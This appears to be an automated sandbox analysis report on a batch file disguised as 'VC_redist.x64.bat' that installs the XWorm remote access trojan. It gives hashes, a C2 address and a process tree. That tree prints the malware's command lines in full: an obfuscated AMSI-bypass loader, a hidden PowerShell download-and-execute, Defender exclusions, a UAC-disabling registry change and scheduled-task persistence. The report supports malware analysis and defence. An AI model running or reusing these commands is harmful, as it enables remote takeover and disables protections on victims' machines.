Analysis

  • max time kernel
    150s
  • max time network
    143s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20250217-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20250217-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    01/03/2025, 23:41

General

  • Target

    VC_redist.x64.bat

  • Size

    27KB

  • MD5

    59ed597b16bdecda0fa1f5317d679506

  • SHA1

    e2117126d6e4b2dd02d4eee180c8f786c9b6424e

  • SHA256

    8b095c70bb18e878b288db10c7b9d5de9ed2df22f075b30ed0cbf3fdcb2c9342

  • SHA512

    d37b2f951d1093bb1f750d6996e080f0f5b20ac2cf5139f32f1b154bf2d4a61a8ecb033383e6a3d7fbb875dae63d147d7dc97bc241bf2da1497e378822004dea

  • SSDEEP

    384:eQxxUGTxvOwLNVpRP5mx39dm7dQgh+1Oi:xxigvOwLDpd5mx39L

Malware Config

Extracted

Family

xworm

Version

3.1

C2

185.172.175.125:5000

Mutex

Uto2xJheY5reQlME

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Xworm Payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 2 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 6 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops file in System32 directory 13 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 9 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:628
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:888
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{b6bf4757-b5d5-4657-b9af-57cc52bda2d7}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4668
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:676
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:980
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:388
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:412
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                1⤵
                  PID:456
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                  1⤵
                    PID:1028
                  • C:\Windows\System32\svchost.exe
                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                    1⤵
                      PID:1108
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:1144
                      • C:\Windows\system32\taskhostw.exe
                        taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                        2⤵
                          PID:3124
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:BYxITSJgVUCd{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$OQhtHJPpToNjvv,[Parameter(Position=1)][Type]$AFhQLkIedi)$aOXQrXhFaPH=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+'l'+'e'+[Char](99)+'ted'+'D'+'e'+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+'M'+'e'+''+'m'+''+[Char](111)+''+'r'+''+[Char](121)+''+'M'+''+[Char](111)+''+'d'+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+'e'+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+'e','Cla'+[Char](115)+'s'+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+'si'+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'A'+[Char](117)+''+[Char](116)+''+[Char](111)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$aOXQrXhFaPH.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+'p'+''+'e'+''+'c'+'i'+[Char](97)+''+[Char](108)+'N'+[Char](97)+'m'+[Char](101)+',H'+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+''+[Char](83)+''+[Char](105)+''+'g'+','+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$OQhtHJPpToNjvv).SetImplementationFlags('R'+[Char](117)+''+'n'+'time'+','+''+[Char](77)+''+[Char](97)+''+'n'+''+'a'+'ged');$aOXQrXhFaPH.DefineMethod(''+[Char](73)+'n'+[Char](118)+'o'+[Char](107)+'e',''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+'S'+'i'+[Char](103)+''+','+''+'N'+''+'e'+'w'+[Char](83)+''+[Char](108)+'o'+[Char](116)+','+[Char](86)+''+'i'+'r'+'t'+'u'+[Char](97)+'l',$AFhQLkIedi,$OQhtHJPpToNjvv).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+'me,'+'M'+''+[Char](97)+'n'+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $aOXQrXhFaPH.CreateType();}$ZQIrXbTTIGqKB=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+'t'+'e'+''+'m'+''+[Char](46)+'dl'+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+'s'+[Char](111)+'f'+'t'+''+[Char](46)+'W'+[Char](105)+''+'n'+''+[Char](51)+''+[Char](50)+''+[Char](46)+'U'+'n'+'s'+[Char](97)+''+[Char](102)+''+[Char](101)+'N'+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+'t'+''+'h'+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$oMevXYQUvmRWCU=$ZQIrXbTTIGqKB.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+'cA'+'d'+''+[Char](100)+''+[Char](114)+''+'e'+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+'ubl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](116)+''+[Char](97)+'t'+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ZNLqRlVHXZYfcRuKRIa=BYxITSJgVUCd @([String])([IntPtr]);$gTIqHnHwVCQTrkHzdlxiRk=BYxITSJgVUCd @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$EhPfNcBIlHl=$ZQIrXbTTIGqKB.GetMethod(''+'G'+'etMod'+[Char](117)+'l'+[Char](101)+''+[Char](72)+''+'a'+''+[Char](110)+''+[Char](100)+'le').Invoke($Null,@([Object](''+'k'+''+[Char](101)+'r'+[Char](110)+'e'+[Char](108)+'32'+[Char](46)+'d'+[Char](108)+'l')));$jlkYgJasaIdNbg=$oMevXYQUvmRWCU.Invoke($Null,@([Object]$EhPfNcBIlHl,[Object](''+[Char](76)+''+[Char](111)+''+'a'+''+[Char](100)+'L'+'i'+''+'b'+''+[Char](114)+'a'+'r'+''+'y'+''+[Char](65)+'')));$TyocFEykjCvutDOFS=$oMevXYQUvmRWCU.Invoke($Null,@([Object]$EhPfNcBIlHl,[Object]('Vi'+[Char](114)+''+[Char](116)+'u'+[Char](97)+'l'+[Char](80)+'r'+'o'+'t'+[Char](101)+''+'c'+''+[Char](116)+'')));$PVCZddX=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jlkYgJasaIdNbg,$ZNLqRlVHXZYfcRuKRIa).Invoke(''+[Char](97)+'ms'+[Char](105)+''+[Char](46)+''+[Char](100)+''+'l'+'l');$LRxbtWjUSUgORYroA=$oMevXYQUvmRWCU.Invoke($Null,@([Object]$PVCZddX,[Object]('A'+'m'+''+[Char](115)+''+[Char](105)+''+[Char](83)+'c'+[Char](97)+''+[Char](110)+''+[Char](66)+'u'+[Char](102)+''+'f'+''+'e'+'r')));$uHtkjkXvwG=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TyocFEykjCvutDOFS,$gTIqHnHwVCQTrkHzdlxiRk).Invoke($LRxbtWjUSUgORYroA,[uint32]8,4,[ref]$uHtkjkXvwG);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$LRxbtWjUSUgORYroA,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TyocFEykjCvutDOFS,$gTIqHnHwVCQTrkHzdlxiRk).Invoke($LRxbtWjUSUgORYroA,[uint32]8,0x20,[ref]$uHtkjkXvwG);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+'F'+[Char](84)+''+'W'+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+'s'+'vs'+'t'+'ag'+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Command and Scripting Interpreter: PowerShell
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:4736
                        • C:\Users\Admin\AppData\Roaming\svOrbEl0.exe
                          "C:\Users\Admin\AppData\Roaming\svOrbEl0.exe"
                          2⤵
                          • Executes dropped EXE
                          PID:4028
                        • C:\Users\Admin\AppData\Roaming\svOrbEl0.exe
                          "C:\Users\Admin\AppData\Roaming\svOrbEl0.exe"
                          2⤵
                          • Executes dropped EXE
                          PID:2704
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                        1⤵
                          PID:1196
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                          1⤵
                            PID:1304
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                            1⤵
                              PID:1320
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                              1⤵
                                PID:1364
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                1⤵
                                  PID:1416
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                  1⤵
                                    PID:1436
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                    1⤵
                                      PID:1516
                                      • C:\Windows\system32\sihost.exe
                                        sihost.exe
                                        2⤵
                                        • Modifies registry class
                                        PID:1944
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                      1⤵
                                        PID:1612
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                        1⤵
                                          PID:1632
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                          1⤵
                                            PID:1712
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                            1⤵
                                              PID:1744
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1820
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                1⤵
                                                  PID:1948
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1960
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:1972
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                      1⤵
                                                        PID:2004
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                        1⤵
                                                          PID:1192
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:2152
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                            1⤵
                                                              PID:2264
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                              1⤵
                                                                PID:2368
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                1⤵
                                                                  PID:2420
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                  1⤵
                                                                    PID:2520
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                    1⤵
                                                                      PID:2532
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                      1⤵
                                                                      • Drops file in System32 directory
                                                                      • Modifies data under HKEY_USERS
                                                                      PID:2648
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                      1⤵
                                                                        PID:2712
                                                                      • C:\Windows\sysmon.exe
                                                                        C:\Windows\sysmon.exe
                                                                        1⤵
                                                                          PID:2724
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                          1⤵
                                                                            PID:2760
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                            1⤵
                                                                              PID:2776
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                              1⤵
                                                                                PID:2320
                                                                              • C:\Windows\system32\wbem\unsecapp.exe
                                                                                C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                1⤵
                                                                                  PID:400
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                  1⤵
                                                                                    PID:3192
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                    1⤵
                                                                                      PID:3472
                                                                                    • C:\Windows\Explorer.EXE
                                                                                      C:\Windows\Explorer.EXE
                                                                                      1⤵
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:3556
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\VC_redist.x64.bat"
                                                                                        2⤵
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:3708
                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          3⤵
                                                                                            PID:3724
                                                                                          • C:\Windows\system32\chcp.com
                                                                                            chcp.com 437
                                                                                            3⤵
                                                                                              PID:1928
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c type tmp
                                                                                              3⤵
                                                                                                PID:824
                                                                                              • C:\Windows\system32\find.exe
                                                                                                fInd
                                                                                                3⤵
                                                                                                  PID:2964
                                                                                                • C:\Windows\system32\find.exe
                                                                                                  find
                                                                                                  3⤵
                                                                                                    PID:2304
                                                                                                  • C:\Windows\system32\findstr.exe
                                                                                                    fiNdstr /L /I set C:\Users\Admin\AppData\Local\Temp\VC_redist.x64.bat
                                                                                                    3⤵
                                                                                                      PID:4832
                                                                                                    • C:\Windows\system32\findstr.exe
                                                                                                      fiNdstr /L /I goto C:\Users\Admin\AppData\Local\Temp\VC_redist.x64.bat
                                                                                                      3⤵
                                                                                                        PID:2552
                                                                                                      • C:\Windows\system32\findstr.exe
                                                                                                        fiNdstr /L /I echo C:\Users\Admin\AppData\Local\Temp\VC_redist.x64.bat
                                                                                                        3⤵
                                                                                                          PID:3572
                                                                                                        • C:\Windows\system32\findstr.exe
                                                                                                          fiNdstr /L /I pause C:\Users\Admin\AppData\Local\Temp\VC_redist.x64.bat
                                                                                                          3⤵
                                                                                                            PID:1484
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c type tmp
                                                                                                            3⤵
                                                                                                              PID:3780
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              PowerShell -WindowStyle Hidden -Command "$codes = 104,116,116,112,115,58,47,47,102,105,108,101,115,46,99,97,116,98,111,120,46,109,111,101,47,99,122,49,50,57,114,46,48,48,69,113,113;irm $([Text.Encoding]::ASCII.GetString(@($codes))) | iex"
                                                                                                              3⤵
                                                                                                              • Blocklisted process makes network request
                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                              • Downloads MZ/PE file
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                              PID:848
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EXEcUTIONPoLICY ByPASS AdD-mPPrefEReNce -exCLUSioNPatH $eNv:PROGraMdatA, $enV:TeMp, $ENV:hoMeDRIvE; SEt-iTEmPRopErTy -PaTh "HKLM:\SOFTwArE\MicroSoFt\wINDOWs\curRenTVERsiON\PoLiCieS\sySTEm" -nAME "ConSENtprOmPTbEHAViorAdMIN" -VAluE 0 -tYPe DwoRD
                                                                                                                4⤵
                                                                                                                • UAC bypass
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:4580
                                                                                                              • C:\ProgramData\FMyUS.eXe
                                                                                                                "C:\ProgramData\FMyUS.eXe"
                                                                                                                4⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:2260
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\VjhvVGIe.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\VjhvVGIe.exe"
                                                                                                                  5⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:2344
                                                                                                              • C:\ProgramData\svOrbEl0.exe
                                                                                                                "C:\ProgramData\svOrbEl0.exe"
                                                                                                                4⤵
                                                                                                                • Checks computer location settings
                                                                                                                • Drops startup file
                                                                                                                • Executes dropped EXE
                                                                                                                • Adds Run key to start application
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:2548
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svOrbEl0.exe'
                                                                                                                  5⤵
                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:4292
                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    6⤵
                                                                                                                      PID:4124
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svOrbEl0.exe'
                                                                                                                    5⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:2240
                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      6⤵
                                                                                                                        PID:5064
                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svOrbEl0.exe'
                                                                                                                      5⤵
                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      PID:2480
                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        6⤵
                                                                                                                          PID:4004
                                                                                                                      • C:\Windows\System32\schtasks.exe
                                                                                                                        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svOrbEl0" /tr "C:\Users\Admin\AppData\Roaming\svOrbEl0.exe"
                                                                                                                        5⤵
                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                        PID:1428
                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          6⤵
                                                                                                                            PID:3976
                                                                                                                      • C:\ProgramData\1ZRs6.EXe
                                                                                                                        "C:\ProgramData\1ZRs6.EXe"
                                                                                                                        4⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        PID:1888
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c mountvol | find ":\"
                                                                                                                      3⤵
                                                                                                                        PID:3644
                                                                                                                        • C:\Windows\system32\mountvol.exe
                                                                                                                          mountvol
                                                                                                                          4⤵
                                                                                                                            PID:1576
                                                                                                                          • C:\Windows\system32\find.exe
                                                                                                                            find ":\"
                                                                                                                            4⤵
                                                                                                                              PID:4240
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            powershell -c add-mppreference -exclusionpath C:\
                                                                                                                            3⤵
                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            PID:4920
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            powershell -c add-mppreference -exclusionpath F:\
                                                                                                                            3⤵
                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                            PID:3184
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            powershell -c add-mppreference -exclusionpath E:\
                                                                                                                            3⤵
                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                            PID:3920
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            powershell -Command "$url = @();$url += 'h';$url += 't';$url += 't';$url += 'p';$url += 's';$url += ':';$url += '/';$url += '/';$url += 'f';$url += 'i';$url += 'l';$url += 'e';$url += 's';$url += '.';$url += 'c';$url += 'a';$url += 't';$url += 'b';$url += 'o';$url += 'x';$url += '.';$url += 'm';$url += 'o';$url += 'e';$url += '/';$url += 'l';$url += 'l';$url += 'l';$url += 'l';$url += 't';$url += 'm';$url += '.';$url += 'f';$url += 'M';$url += '2';$url += 'G';$url += 'z';$url = $url -join '';$output = \"$env:PUBLIC\winglog32.exe\";$output2 = \"$env:PUBLIC\winglog64.exe\"; Invok耻耻豆德:~13,1色饿克饿:~26,1%豆德阿维:~54,1%耻饿维饿:~49,1%阿维色尔:~10,1%阿维色尔:~22,1%阿维色尔:~14,1%豆德阿维:~51,1%耻饿维饿:~8,1%耻耻豆德:~39,1%豆德阿维:~60,1%色饿克饿:~57,1豆德阿维:~58,1%耻饿维饿:~32,1%耻耻豆德:~51,1%色饿克饿:~57,1耻饿维饿:~4,1%豆德阿维:~19,1%耻饿维饿:~31,1%色饿克饿:~57,1色饿克饿:~48,1%耻饿维饿:~4,1%阿维色尔:~54,1%耻饿维饿:~22,1%耻饿维饿:~54,1%豆德阿维:~18,1%豆德阿维:~54,1%色饿克饿:~57,1豆德阿维:~57,1%豆德阿维:~51,1%阿维色尔:~54,1%耻耻豆德:~43,1%耻耻豆德:~12,1%耻饿维饿:~18,1耻饿维饿:~30,1%阿维色尔:~52,1%阿维色尔:~54,1%阿维色尔:~39,1%阿维色尔:~42,1%阿维色尔:~54,1耻耻豆德:~9,1%豆德阿维:~19,1%耻耻豆德:~23,1%色饿克饿:~0,1%色饿克饿:~30,1%耻耻豆德:~39,1%豆德阿维:~48,1%色饿克饿:~57,1耻耻豆德:~33,1%耻耻豆德:~51,1%豆德阿维:~18,1%色饿克饿:~30,1%阿维色尔:~37,1%色饿克饿:~45,1%色饿克饿:~10,1%豆德阿维:~7,1%阿维色尔:~56,1色饿克饿:~52,1%耻耻豆德:~12,1%色饿克饿:~10,1%耻饿维饿:~28,1%豆德阿维:~51,1%阿维色尔:~54,1%耻饿维饿:~30,1耻耻豆德:~21,1%色饿克饿:~45,1%豆德阿维:~38,1%色饿克饿:~10,1"
                                                                                                                            3⤵
                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                            PID:1244
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                        1⤵
                                                                                                                          PID:3668
                                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                          1⤵
                                                                                                                            PID:3956
                                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                            1⤵
                                                                                                                              PID:3804
                                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                              1⤵
                                                                                                                                PID:4320
                                                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                1⤵
                                                                                                                                  PID:4600
